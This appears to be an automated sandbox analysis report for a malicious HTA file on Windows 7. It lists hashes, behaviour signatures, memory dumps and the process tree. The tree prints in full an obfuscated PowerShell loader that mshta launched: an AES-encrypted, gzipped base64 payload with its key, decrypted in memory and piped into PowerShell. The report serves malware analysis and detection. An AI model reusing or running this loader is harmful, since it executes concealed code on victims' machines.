Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05-03-2024 02:01

General

  • Target

    06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta

  • Size

    72KB

  • MD5

    e09e50f4c8308806ae21242538e17e88

  • SHA1

    3d5d0f3e384ec93f87716cc49487cd7ef1e8714a

  • SHA256

    06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f

  • SHA512

    a5557c34562a8f2cf1ba07029f07d389788579c4333e0856da1b6b7ba09484015dbfcf8f6f43d3e21787e8ef70b82062d29ebbfaf57fc50ed6d2015b272c7259

  • SSDEEP

    768:fEnAiXp/x27ioVgCtTLalOmilXO3SuDbvq572+/unhi1zOz:Mn/p/x27ioVgCtTLbmweSuPyKti5Oz

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2612

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c3e011120b6ad889373fb7fd8636d767

    SHA1

    452e693b2bb223ee6afda9cb2266f8f02e0135e7

    SHA256

    ad5164bd9309f63da8508380cf58e1f128d8786b78aac0c0fa25a5cd1b7192f9

    SHA512

    0edf1d610e9016b0e0c0bcce6ec2a8f74dec5fa9848b6bc61c05cf4f29df2ce6269e8667f4103cc0633a842589d5b49befe55270608b7f816e1f3f4c3dc0663b

  • memory/2156-2-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2156-3-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2156-4-0x0000000002560000-0x00000000025A0000-memory.dmp

    Filesize

    256KB

  • memory/2156-5-0x0000000002560000-0x00000000025A0000-memory.dmp

    Filesize

    256KB

  • memory/2156-15-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2612-11-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2612-12-0x0000000002600000-0x0000000002640000-memory.dmp

    Filesize

    256KB

  • memory/2612-13-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2612-14-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB